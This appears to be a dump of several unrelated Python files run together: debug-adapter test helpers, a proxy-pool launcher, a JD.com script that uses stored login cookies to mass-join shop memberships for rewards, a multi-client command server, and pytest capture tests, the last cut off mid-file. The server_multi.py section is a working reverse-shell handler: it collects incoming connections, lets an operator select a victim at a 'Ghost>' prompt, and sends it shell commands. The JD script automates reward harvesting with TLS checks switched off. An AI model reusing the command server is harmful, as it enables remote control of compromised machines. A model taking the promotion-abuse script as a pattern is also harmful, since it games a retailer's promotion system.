if body == some.error:
items += (("message", compat.force_str(body)),)
else:
items += (("body", body),)
exp.describe = lambda: _describe_message("response", *items)
return exp
class Occurrence(Expectation):
has_lower_bound = True
def __init__(self, *circumstances):
assert circumstances
self.circumstances = circumstances
self.timeline = None
self.timestamp = None
self.index = None
self.previous = None
self._next = None
self.observed = False
@property
def next(self):
if self.timeline is None:
return None
with self.timeline.frozen():
was_last = self is self.timeline.last
occ = self._next
if was_last:
# The .next property of the last occurrence in a timeline can change
# at any moment when timeline isn't frozen. So if it wasn't frozen by
# the caller, this was an unsafe operation, and we should complain.
self.timeline.expect_frozen()
return occ
def preceding(self):
it = self.and_preceding()
next(it)
return it
def and_preceding(self, up_to=None, inclusive=False):
assert self.timeline is not None
assert up_to is None or isinstance(up_to, Expectation)
if isinstance(up_to, Occurrence) and self < up_to:
return
occ = self
while occ != up_to:
yield occ
occ = occ.previous
if inclusive:
yield occ
def following(self):
it = self.and_following()
next(it)
return it
def and_following(self, up_to=None, inclusive=False):
assert self.timeline is not None
assert up_to is None or isinstance(up_to, Expectation)
if up_to is None:
self.timeline.expect_frozen()
if isinstance(up_to, Occurrence) and up_to < self:
return
occ = self
while occ != up_to:
yield occ
occ = occ.next
if inclusive:
yield occ
def precedes(self, occurrence):
assert isinstance(occurrence, Occurrence)
return any(occ is self for occ in occurrence.preceding())
def follows(self, occurrence):
return occurrence.precedes(self)
def realizes(self, expectation):
assert isinstance(expectation, Expectation)
return expectation == self
def test(self, first, last):
assert isinstance(first, Occurrence)
assert isinstance(last, Occurrence)
for occ in first.and_following(up_to=last, inclusive=True):
if occ is self:
yield {self: self}
def __lt__(self, occurrence):
return self.precedes(occurrence)
def __gt__(self, occurrence):
return occurrence.precedes(self)
def __le__(self, occurrence):
return self is occurrence or self < occurrence
def __ge__(self, occurrence):
return self is occurrence or self > occurrence
def __rshift__(self, expectation):
assert isinstance(expectation, Expectation)
return expectation.after(self)
def __hash__(self):
return hash(id(self))
def __repr__(self):
return fmt(
"{2}{0}.{1}",
self.index,
self.describe_circumstances(),
"" if self.observed else "*",
)
def describe_circumstances(self):
rest = repr(self.circumstances[1:])
if rest.endswith(",)"):
rest = rest[:-2] + ")"
return fmt("{0}{1}", self.circumstances[0], rest)
class MessageOccurrence(Occurrence):
"""An occurrence representing a DAP message (event, request, or response).
Its circumstances == (self.TYPE, self._key, self._data).
"""
TYPE = None
"""Used for self.circumstances[0].
Must be defined by subclasses.
"""
def __init__(self, message):
assert self.TYPE
assert isinstance(message, messaging.Message)
# Assign message first for the benefit of self._data in child classes.
self.message = message
super(MessageOccurrence, self).__init__(self.TYPE, self._key, self._data)
@property
def seq(self):
return self.message.seq
@property
def _key(self):
"""The part of the message that describes it in general terms - e.g. for
an event, it's the name of the event.
"""
raise NotImplementedError
@property
def _data(self):
"""The part of the message that is used for matching expectations, excluding
self._key.
"""
raise NotImplementedError
@property
def _id(self):
"""The part of the message that is necessary and sufficient to uniquely
identify it. Used for __repr__().
Must be an ordered list of key-value tuples, suitable for OrderedDict().
"""
return [("seq", self.message.seq), ("type", self.TYPE)]
def __call__(self, *args, **kwargs):
return self.message(*args, **kwargs)
def describe_circumstances(self):
id = collections.OrderedDict(self._id)
# Keep it all on one line if it's short enough, but indent longer ones.
s = fmt("{0!j:indent=None}", id)
if len(s) > SINGLE_LINE_REPR_LIMIT:
s = fmt("{0!j}", id)
return s
# For messages, we don't want to include their index, because they already have
# "seq" to identify them uniquely, and including both is confusing.
def __repr__(self):
return ("" if self.observed else "*") + self.describe_circumstances()
class EventOccurrence(MessageOccurrence):
TYPE = "event"
def __init__(self, message):
assert isinstance(message, messaging.Event)
super(EventOccurrence, self).__init__(message)
@property
def event(self):
return self.message.event
@property
def body(self):
return self.message.body
@property
def _key(self):
return self.event
@property
def _data(self):
return self.body
@property
def _id(self):
return super(EventOccurrence, self)._id + [("event", self.message.event)]
class RequestOccurrence(MessageOccurrence):
TYPE = "request"
def __init__(self, message):
assert isinstance(message, messaging.Request)
super(RequestOccurrence, self).__init__(message)
self.response = None
if isinstance(message, messaging.OutgoingRequest):
self.on_response = message.on_response
@property
def command(self):
return self.message.command
@property
def arguments(self):
return self.message.arguments
@property
def _key(self):
return self.command
@property
def _data(self):
return self.arguments
@property
def _id(self):
return super(RequestOccurrence, self)._id + [("command", self.message.command)]
def wait_for_response(self, freeze=True, raise_if_failed=True):
response = Response(self, some.object).wait_until_realized(freeze)
assert response.observed
if raise_if_failed and not response.success:
raise response.body
else:
return response
class ResponseOccurrence(MessageOccurrence):
TYPE = "response"
def __init__(self, request_occ, message):
assert isinstance(request_occ, RequestOccurrence)
assert isinstance(message, messaging.Response)
# Assign request first for the benefit of self._key.
self.request = request_occ
request_occ.response = self
super(ResponseOccurrence, self).__init__(message)
@property
def body(self):
return self.message.body
@property
def result(self):
return self.message.result
@property
def success(self):
return self.message.success
@property
def _key(self):
return self.request
@property
def _data(self):
return self.body
@property
def _id(self):
return super(ResponseOccurrence, self)._id + [
("command", self.message.request.command),
("request_seq", self.message.request.seq),
]
def causing(self, *expectations):
for exp in expectations:
(self >> exp).wait()
return self
def earliest_of(occurrences):
return min(occurrences, key=lambda occ: occ.index)
def latest_of(occurrences):
return max(occurrences, key=lambda occ: occ.index)
|
main.py
|
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: main.py
Description : 运行主函数
Author : JHao
date: 2017/4/1
-------------------------------------------------
Change Activity:
2017/4/1:
-------------------------------------------------
"""
__author__ = 'JHao'
import sys
from multiprocessing import Process
sys.path.append('.')
sys.path.append('..')
from Api.ProxyApi import run as ProxyApiRun
from Schedule.ProxyValidSchedule import run as ValidRun
from Schedule.ProxyRefreshSchedule import run as RefreshRun
def run():
p_list = list()
p1 = Process(target=ProxyApiRun, name='ProxyApiRun') # 服务器
p_list.append(p1)
p2 = Process(target=ValidRun, name='ValidRun') # 循环验证 useful_proxy
p_list.append(p2)
p3 = Process(target=RefreshRun, name='RefreshRun') # 获取+批量刷新
p_list.append(p3)
for p in p_list:
p.daemon = True
p.start()
for p in p_list:
p.join()
if __name__ == '__main__':
run()
|
main.py
|
import atexit
import os
import re
import sys
import threading
import time
import traceback
import yaml
import requests
import datetime
@atexit.register
def _end():
end_time = time.time()
print(to_log("INFO", "执行结束", "执行耗时{:.3f}s".format(end_time - start_time)))
def get_shopid():
"""
获取 shopid, 如果网络上的更新时间比本地早则使用本地的,其它则使用网络上的
"""
try:
net_res = requests.get(CONFIG['shop_id_url'], timeout=30)
if net_res.status_code != 200:
raise Exception
except:
print(to_log("ERROR", "获取线上 shopid 失败"))
if os.path.exists(get_file_path("shopid.yaml")):
try:
res = yaml.safe_load(open(get_file_path("shopid.yaml"), "r", encoding="utf-8"))
except:
os.remove(get_file_path("shopid.yaml"))
print(to_log("ERROR", "shopid.yaml损坏", "已经删除损坏文件,请重新打开"))
sys.exit()
try:
if (datetime.datetime.strptime(str(yaml.safe_load(net_res.text)['update_time']),
'%Y-%m-%d') - datetime.datetime.strptime(str(res['update_time']),
'%Y-%m-%d')).days > 0:
print(to_log("INFO", "已更新 shopid"))
res = yaml.safe_load(net_res.text)
open(get_file_path("shopid.yaml"), "w", encoding="utf-8").write(net_res.text)
except:
pass
print(to_log("INFO", "shopid更新时间", str(res['update_time'])))
return True, res['shop_id']
def get_timestamp():
"""
获取毫秒时间戳
:return:
"""
return str(int(time.time() * 1000))
def get_file_path(file_name=""):
"""
获取文件绝对路径, 防止在某些情况下报错
:param file_name: 文件名
:return:
"""
return os.path.join(os.path.split(sys.argv[0])[0], file_name)
def to_log(info_type="", title="", info=""):
"""
:param info_type: 日志的等级
:param title: 日志的标题
:param info: 日志的信息
:return:
"""
if not os.path.exists(get_file_path("logs")):
os.mkdir(get_file_path("logs/"))
now = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
log = now + " " + info_type + " " + title + " " + info
with open(get_file_path("logs/jdbm.log"), "a", encoding="utf-8") as log_a_file_io:
log_a_file_io.write(log + "\n")
return log
def get_headers(cookie, host):
"""
返回请求头
:param cookie:
:param host:
:return:
"""
return {
"Cookie": cookie,
"Host": host,
"Referer": "https://m.jd.com",
"User-Agent": CONFIG['user-agent'][0]
}
def get_user_info(cookie):
"""
获取用户信息
:type cookie: str
:return: bool: 是否成功, str: 用户名, str: 用户金豆数量
"""
try:
url = "https://me-api.jd.com/user_new/info/GetJDUserInfoUnion"
res = requests.get(url, headers=get_headers(cookie, "me-api.jd.com"), verify=False)
if res.status_code == 200 and res.json()["msg"] == "success":
return True, res.json()["data"]["userInfo"]["baseInfo"]["nickname"], res.json()["data"]["assetInfo"][
"beanNum"]
else:
return False, None, None
except:
to_log("ERROR", "获取用户信息错误", traceback.format_exc())
return False, None, None
def get_venderId(shop_id):
"""
将 `shop_id` 转换为 `venderId`
:param shop_id:
:return: bool: 是否成功, str: venderID
"""
try:
res = requests.get("https://shop.m.jd.com/?shopId=" + str(shop_id), verify=False)
_res = re.compile("venderId: '(\\d*)'").findall(res.text)
if res.status_code == 200 and len(_res):
return True, re.compile("venderId: '(\\d*)'").findall(res.text)[0]
else:
# TODO: 如果获取不到 venderID 的错误
return False, None
except:
to_log("ERROR", "获取 venderId 错误", traceback.format_exc())
return False, None
def get_shop_open_card_info(cookie, shop_id):
"""
获取店铺会员信息
:param cookie:
:param shop_id:
:return: bool: 是否成功, str: 奖励名称, str: 奖励数量, str: activityId
"""
try:
status, venderId = get_venderId(shop_id)
if not status:
return False, None, None, None
params = {
"appid": "jd_shop_member",
"functionId": "getShopOpenCardInfo",
"body": '{"venderId":"' + venderId + '","channel":406}',
"client": "H5",
"clientVersion": "9.2.0",
"uuid": "88888"
}
host = "api.m.jd.com"
url = "https://api.m.jd.com/client.action"
res = requests.get(url, params=params, headers=get_headers(cookie, host), verify=False)
if res.status_code == 200 and res.json()['success']:
if not res.json()['result']['userInfo']['openCardStatus'] and res.json()['result']['interestsRuleList'] \
is not None:
for interests_info in res.json()['result']['interestsRuleList']:
if interests_info['prizeName'] == "京豆":
process[1] += int(interests_info['discountString'])
return True, interests_info['prizeName'], interests_info['discountString'], \
interests_info['interestsInfo']['activityId']
elif interests_info['prizeName'] == "元红包":
process[2] += int(interests_info['discountString'])
return True, interests_info['prizeName'], interests_info['discountString'], \
interests_info['interestsInfo']['activityId']
return False, None, None, None
except:
print(to_log("ERROR", "获取店铺信息错误", traceback.format_exc()))
return False, None, None, None
def bind_with_vender(cookie, shop_id, activity_id):
"""
入会
:param cookie: 用户cookie
:param shop_id: 店铺 id
:param activity_id: 活动 id 重要!(如果没有这个就不能获得奖励)
:return:
"""
try:
status, venderId = get_venderId(shop_id)
if not status:
return False
# 请到 config.yaml 更改配置
params = {
"appid": "jd_shop_member",
"functionId": "bindWithVender",
"body": '{"venderId":"' + venderId + '","shopId":"' + str(
shop_id) + '","bindByVerifyCodeFlag":1,"registerExtend":{"v_sex":"' + CONFIG['register'][
'v_sex'] + '","v_birthday":"' + str(CONFIG['register']['v_birthday']) + '","v_name":"' +
CONFIG['register']['v_name'] + '"},"writeChildFlag":0,"activityId":' + str(
activity_id) + ',"channel":406}',
"client": "H5",
"clientVersion": "9.2.0",
"uuid": "88888"
}
host = "api.m.jd.com"
url = "https://api.m.jd.com/client.action"
res = requests.get(url, params=params, headers=get_headers(cookie, host), verify=False)
# TODO:
# {"code":0,"success":true,"busiCode":"210","message":"您的账户已经是本店会员","result":null}
# {"code":0,"success":true,"busiCode":"0","message":"加入店铺会员成功","result":{"headLine":"您已成功加入店铺会员","giftInfo":null,"interactActivityDTO":null}}
if res.json()["success"] and res.json()["result"]["giftInfo"] is not None:
return True
else:
# TODO: 记录没有入会成功的日志
return False
except:
to_log("ERROR", "入会错误", traceback.format_exc())
return False
def bind(cookie, thread):
global process
for _ in shop_id_list[thread::CONFIG['thread']]:
status, prize_name, discount, activity_id = get_shop_open_card_info(cookie, _)
process[0] += 1
if status:
# 筛选条件
if prize_name == "京豆" and int(discount) < CONFIG['screening']['bean']:
return
if prize_name == "元红包" and not CONFIG['screening']['voucher']:
return
if bind_with_vender(cookie, _, activity_id):
print(to_log("INFO", "开卡成功", "在" + str(_) + "获得 " + str(discount) + prize_name))
def main():
try:
global process
for _ in CONFIG['cookies']:
process = [0, 0, 0]
status, username, bean_num = get_user_info(_)
if status:
print(to_log("INFO", "账号名称: " + str(username) + " 现有京豆数量: " + str(bean_num)))
for thread in range(CONFIG['thread']):
# xxx(cookie=_, shop_id_list=shop_id_list, thread=thread)
threading.Thread(target=bind, args=(_, thread,)).start()
while threading.active_count() != 1:
print("\r 账号:{}, 已尝试{}个店铺,获得{}京豆和{}元红包".format(username, process[0], process[1], process[2]),
end="")
time.sleep(0.5)
else:
print(to_log("ERROR", "cookie失效", _[-15:]))
print(to_log("INFO", "账号{}".format(username),
"共尝试{}个店铺,共获得{}京豆和{}元红包\n".format(process[0], process[1], process[2])))
except:
print(to_log("ERROR", "运行错误", "在" + traceback.format_exc()))
if __name__ == '__main__':
start_time = time.time()
# 忽略警告
requests.packages.urllib3.disable_warnings()
if not os.path.exists(get_file_path("config.yaml")):
print(to_log("ERROR", "未找到配置`config.yaml`", "请查看 https://github.com/AntonVanke/JDBrandMember"))
sys.exit()
CONFIG = yaml.safe_load(open(get_file_path("config.yaml"), "r", encoding="utf-8"))
process = [0, 0, 0]
# 获取 shopid 列表
shopid_status, shop_id_list = get_shopid()
if not shopid_status:
print(to_log("ERROR", "未找到关键文件", "请查看 https://github.com/AntonVanke/JDBrandMember"))
sys.exit()
main()
|
server_multi.py
|
import socket
import sys
import threading
import time
from queue import Queue
NUMBER_OF_THREADS = 2
JOB_NUMBER =[1,2]
queue = Queue()
all_connections = []
all_addressess = []
# Create a socket ( connects two computer )
def create_socket():
try:
global host
global port
global s
host = ''
port = 9998
s = socket.socket()
except socket.error as msg:
print("Socket execution created error {}".format(msg))
# Binding the socket and listening for connection
def bind_socket():
try:
global host
global port
global s
print("Binding the Port: {}".format(port))
s.bind((host,port))
s.listen(5)
except socket.error as msg:
print("Socket Binding error {} '\n' Retrying .....".format(msg))
bind_socket()
# Handling connections from multiple clients and saving to a line
# Closing previous connections when server.py file is restarted
def acceptin_connections():
for c in all_connections:
c.close()
del all_connections[:]
del all_addressess[:]
while True:
try:
conn, address = s.accept()
s.setblocking(1) # Prevent Timeout
all_addressess.append(address)
all_connections.append(conn)
print("Connection has been esablished! IP : {0} | PORT : {1}".format(address[0],str(address[1])))
except:
print("Error accepting connection")
continue
# 2nd Thread functions :- 1) see all the clients 2) select a client 3) send commands to connected client
def start_ghost():
while True:
cmd = input("Ghost> ")
if cmd == 'list':
list_connections()
elif 'select' in cmd:
conn = get_target(cmd)
if conn is not None:
send_target_commands(conn)
# elif cmd == 'quit':
# print("Ghost going offline")
# sys.exit(0)
# break
else:
print("Command not recognised")
# Display all active connections with clients
def list_connections():
results = ""
for i, conn in enumerate(all_connections):
try:
conn.send(str.encode(" "))
conn.recv(2014780)
except:
del all_connections[i]
del all_addressess[i]
continue
results = str(i) + " IP: " + str(all_addressess[i][0]) + " PORT: " + str(all_connections[i][1]) + "\n"
print("***********Clients********** '\n'" + results)
# selecting the target
def get_target(cmd):
try:
target = cmd.replace("select","")
target = cmd.replace(" ","")
conn = all_connections[int(target)]
print("You are now connected to IP: {0} | PORT: {1}".format(str(all_addressess[target][0]),str(all_connections[target][1])))
print(str(all_addressess[target][0])+"> ",end="")
except:
print("Selection not valid")
def send_target_commands(conn):
while True:
try:
cmd = input()
if cmd == "quit":
conn.close()
s.close()
sys.exit()
if len(str.encode(cmd)) > 0:
conn.send(str.encode(cmd))
client_resp = str(conn.recv(20480),"utf-8")
print("Client Response {}".format(client_resp),end="")
except:
print("Error sending command")
break
# Create worker thread
def create_workers():
for _ in range(NUMBER_OF_THREADS):
t = threading.Thread(target=work) # Here we are creating thread and specifying which sort of work it should perform
t.daemon = True # tells thread to release the memory after its execution finish or terminated
# Do next job that is their in the queue
def work():
while True:
x = queue.get()
if x == 1:
create_socket()
bind_socket()
acceptin_connections()
if x == 2:
start_ghost()
queue.task_done()
def create_jobs():
for j in JOB_NUMBER:
queue.put(j)
queue.join()
create_workers()
create_jobs()
|
test_capture.py
|
import contextlib
import io
import os
import subprocess
import sys
import textwrap
from io import UnsupportedOperation
from typing import BinaryIO
from typing import cast
from typing import Generator
from typing import TextIO
import pytest
from _pytest import capture
from _pytest.capture import _get_multicapture
from _pytest.capture import CaptureManager
from _pytest.capture import CaptureResult
from _pytest.capture import MultiCapture
from _pytest.config import ExitCode
from _pytest.pytester import Testdir
# note: py.io capture tests where copied from
# pylib 1.4.20.dev2 (rev 13d9af95547e)
def StdCaptureFD(
out: bool = True, err: bool = True, in_: bool = True
) -> MultiCapture[str]:
return capture.MultiCapture(
in_=capture.FDCapture(0) if in_ else None,
out=capture.FDCapture(1) if out else None,
err=capture.FDCapture(2) if err else None,
)
def StdCapture(
out: bool = True, err: bool = True, in_: bool = True
) -> MultiCapture[str]:
return capture.MultiCapture(
in_=capture.SysCapture(0) if in_ else None,
out=capture.SysCapture(1) if out else None,
err=capture.SysCapture(2) if err else None,
)
def TeeStdCapture(
out: bool = True, err: bool = True, in_: bool = True
) -> MultiCapture[str]:
return capture.MultiCapture(
in_=capture.SysCapture(0, tee=True) if in_ else None,
out=capture.SysCapture(1, tee=True) if out else None,
err=capture.SysCapture(2, tee=True) if err else None,
)
class TestCaptureManager:
@pytest.mark.parametrize("method", ["no", "sys", "fd"])
def test_capturing_basic_api(self, method):
capouter = StdCaptureFD()
old = sys.stdout, sys.stderr, sys.stdin
try:
capman = CaptureManager(method)
capman.start_global_capturing()
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method == "no":
assert old == (sys.stdout, sys.stderr, sys.stdin)
else:
assert not out
capman.resume_global_capture()
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method != "no":
assert out == "hello\n"
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
def test_init_capturing(self):
capouter = StdCaptureFD()
try:
capman = CaptureManager("fd")
capman.start_global_capturing()
pytest.raises(AssertionError, capman.start_global_capturing)
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_unicode(testdir, method):
obj = "'b\u00f6y'"
testdir.makepyfile(
"""\
# taken from issue 227 from nosetests
def test_unicode():
import sys
print(sys.stdout)
print(%s)
"""
% obj
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_bytes_in_utf8_encoding(testdir, method):
testdir.makepyfile(
"""\
def test_unicode():
print('b\\u00f6y')
"""
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
def test_collect_capturing(testdir):
p = testdir.makepyfile(
"""
import sys
print("collect %s failure" % 13)
sys.stderr.write("collect %s_stderr failure" % 13)
import xyz42123
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*Captured stdout*",
"collect 13 failure",
"*Captured stderr*",
"collect 13_stderr failure",
]
)
class TestPerTestCapturing:
def test_capture_and_fixtures(self, testdir):
p = testdir.makepyfile(
"""
def setup_module(mod):
print("setup module")
def setup_function(function):
print("setup " + function.__name__)
def test_func1():
print("in func1")
assert 0
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"setup module*",
"setup test_func1*",
"in func1*",
"setup test_func2*",
"in func2*",
]
)
@pytest.mark.xfail(reason="unimplemented feature")
def test_capture_scope_cache(self, testdir):
p = testdir.makepyfile(
"""
import sys
def setup_module(func):
print("module-setup")
def setup_function(func):
print("function-setup")
def test_func():
print("in function")
assert 0
def teardown_function(func):
print("in teardown")
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*test_func():*",
"*Captured stdout during setup*",
"module-setup*",
"function-setup*",
"*Captured stdout*",
"in teardown*",
]
)
def test_no_carry_over(self, testdir):
p = testdir.makepyfile(
"""
def test_func1():
print("in func1")
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
s = result.stdout.str()
assert "in func1" not in s
assert "in func2" in s
def test_teardown_capturing(self, testdir):
p = testdir.makepyfile(
"""
def setup_function(function):
print("setup func1")
def teardown_function(function):
print("teardown func1")
assert 0
def test_func1():
print("in func1")
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*teardown_function*",
"*Captured stdout*",
"setup func1*",
"in func1*",
"teardown func1*",
# "*1 fixture failure*"
]
)
def test_teardown_capturing_final(self, testdir):
p = testdir.makepyfile(
"""
def teardown_module(mod):
print("teardown module")
assert 0
def test_func():
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*def teardown_module(mod):*",
"*Captured stdout*",
"*teardown module*",
"*1 error*",
]
)
def test_capturing_outerr(self, testdir):
p1 = testdir.makepyfile(
"""\
import sys
def test_capturing():
print(42)
sys.stderr.write(str(23))
def test_capturing_error():
print(1)
sys.stderr.write(str(2))
raise ValueError
"""
)
result = testdir.runpytest(p1)
result.stdout.fnmatch_lines(
[
"*test_capturing_outerr.py .F*",
"====* FAILURES *====",
"____*____",
"*test_capturing_outerr.py:8: ValueError",
"*--- Captured stdout *call*",
"1",
"*--- Captured stderr *call*",
"2",
]
)
class TestLoggingInteraction:
def test_logging_stream_ownership(self, testdir):
p = testdir.makepyfile(
"""\
def test_logging():
import logging
import pytest
stream = capture.CaptureIO()
logging.basicConfig(stream=stream)
stream.close() # to free memory/release resources
"""
)
result = testdir.runpytest_subprocess(p)
assert result.stderr.str().find("atexit") == -1
def test_logging_and_immediate_setupteardown(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_function(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_function(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors show first!
)
# verify proper termination
assert "closed" not in s
def test_logging_and_crossscope_fixtures(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_module(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_module(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors come first
)
# verify proper termination
assert "closed" not in s
def test_conftestlogging_is_shown(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
logging.warning("hello435")
"""
)
# make sure that logging is still captured in tests
result = testdir.runpytest_subprocess("-s", "-p", "no:capturelog")
assert result.ret == ExitCode.NO_TESTS_COLLECTED
result.stderr.fnmatch_lines(["WARNING*hello435*"])
assert "operation on closed file" not in result.stderr.str()
def test_conftestlogging_and_test_logging(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello():
import logging
logging.warning("hello433")
assert 0
"""
)
result = testdir.runpytest_subprocess(p, "-p", "no:capturelog")
assert result.ret != 0
result.stdout.fnmatch_lines(["WARNING*hello433*"])
assert "something" not in result.stderr.str()
assert "operation on closed file" not in result.stderr.str()
def test_logging_after_cap_stopped(self, testdir):
testdir.makeconftest(
"""\
import pytest
import logging
log = logging.getLogger(__name__)
@pytest.fixture
def log_on_teardown():
yield
log.warning('Logging on teardown')
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello(log_on_teardown):
import logging
logging.warning("hello433")
assert 1
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p, "--log-cli-level", "info")
assert result.ret != 0
result.stdout.fnmatch_lines(
["*WARNING*hello433*", "*WARNING*Logging on teardown*"]
)
assert (
"AttributeError: 'NoneType' object has no attribute 'resume_capturing'"
not in result.stderr.str()
)
class TestCaptureFixture:
@pytest.mark.parametrize("opt", [[], ["-s"]])
def test_std_functional(self, testdir, opt):
reprec = testdir.inline_runsource(
"""\
def test_hello(capsys):
print(42)
out, err = capsys.readouterr()
assert out.startswith("42")
""",
*opt,
)
reprec.assertoutcome(passed=1)
def test_capsyscapfd(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfd):
pass
def test_two(capfd, capsys):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*ERROR*setup*test_one*",
"E*capfd*capsys*same*time*",
"*ERROR*setup*test_two*",
"E*capsys*capfd*same*time*",
"*2 errors*",
]
)
def test_capturing_getfixturevalue(self, testdir):
"""Test that asking for "capfd" and "capsys" using request.getfixturevalue
in the same test is an error.
"""
testdir.makepyfile(
"""\
def test_one(capsys, request):
request.getfixturevalue("capfd")
def test_two(capfd, request):
request.getfixturevalue("capsys")
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(
[
"*test_one*",
"E * cannot use capfd and capsys at the same time",
"*test_two*",
"E * cannot use capsys and capfd at the same time",
"*2 failed in*",
]
)
def test_capsyscapfdbinary(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfdbinary):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
["*ERROR*setup*test_one*", "E*capfdbinary*capsys*same*time*", "*1 error*"]
)
@pytest.mark.parametrize("method", ["sys", "fd"])
def test_capture_is_represented_on_failure_issue128(self, testdir, method):
p = testdir.makepyfile(
"""\
def test_hello(cap{}):
print("xxx42xxx")
assert 0
""".format(
method
)
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["xxx42xxx"])
def test_stdfd_functional(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfd):
import os
os.write(1, b"42")
out, err = capfd.readouterr()
assert out.startswith("42")
capfd.close()
"""
)
reprec.assertoutcome(passed=1)
@pytest.mark.parametrize("nl", ("\n", "\r\n", "\r"))
def test_cafd_preserves_newlines(self, capfd, nl):
print("test", end=nl)
out, err = capfd.readouterr()
assert out.endswith(nl)
def test_capfdbinary(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfdbinary):
import os
# some likely un-decodable bytes
os.write(1, b'\\xfe\\x98\\x20')
out, err = capfdbinary.readouterr()
assert out == b'\\xfe\\x98\\x20'
assert err == b''
"""
)
reprec.assertoutcome(passed=1)
def test_capsysbinary(self, testdir):
p1 = testdir.makepyfile(
r"""
def test_hello(capsysbinary):
import sys
sys.stdout.buffer.write(b'hello')
# Some likely un-decodable bytes.
sys.stdout.buffer.write(b'\xfe\x98\x20')
sys.stdout.buffer.flush()
# Ensure writing in text mode still works and is captured.
# https://github.com/pytest-dev/pytest/issues/6871
print("world", flush=True)
out, err = capsysbinary.readouterr()
assert out == b'hello\xfe\x98\x20world\n'
assert err == b''
print("stdout after")
print("stderr after", file=sys.stderr)
"""
)
result = testdir.runpytest(str(p1), "-rA")
result.stdout.fnmatch_lines(
[
"*- Captured stdout call -*",
"stdout after",
"*- Captured stderr call -*",
"stderr after",
"*= 1 passed in *",
]
)
def test_partial_setup_failure(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capsys, missingarg):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["*test_partial_setup_failure*", "*1 error*"])
def test_keyboardinterrupt_disables_capturing(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capfd):
import os
os.write(1, b'42')
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p)
result.stdout.fnmatch_lines(["*KeyboardInterrupt*"])
assert result.ret == 2
def test_capture_and_logging(self, testdir):
"""#14"""
p = testdir.makepyfile(
"""\
import logging
def test_log(capsys):
logging.error('x')
"""
)
result = testdir.runpytest_subprocess(p)
assert "closed" not in result.stderr.str()
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
@pytest.mark.parametrize("no_capture", [True, False])
def test_disabled_capture_fixture(self, testdir, fixture, no_capture):
testdir.makepyfile(
"""\
def test_disabled({fixture}):
print('captured before')
with {fixture}.disabled():
print('while capture is disabled')
print('captured after')
assert {fixture}.readouterr() == ('captured before\\ncaptured after\\n', '')
def test_normal():
print('test_normal executed')
""".format(
fixture=fixture
)
)
args = ("-s",) if no_capture else ()
result = testdir.runpytest_subprocess(*args)
result.stdout.fnmatch_lines(["*while capture is disabled*", "*= 2 passed in *"])
result.stdout.no_fnmatch_line("*captured before*")
result.stdout.no_fnmatch_line("*captured after*")
if no_capture:
assert "test_normal executed" in result.stdout.str()
else:
result.stdout.no_fnmatch_line("*test_normal executed*")
def test_disabled_capture_fixture_twice(self, testdir: Testdir) -> None:
"""Test that an inner disabled() exit doesn't undo an outer disabled().
Issue #7148.
"""
testdir.makepyfile(
"""
def test_disabled(capfd):
print('captured before')
with capfd.disabled():
print('while capture is disabled 1')
with capfd.disabled():
print('while capture is disabled 2')
print('while capture is disabled 1 after')
print('captured after')
assert capfd.readouterr() == ('captured before\\ncaptured after\\n', '')
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
[
"*while capture is disabled 1",
"*while capture is disabled 2",
"*while capture is disabled 1 after",
],
consecutive=True,
)
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
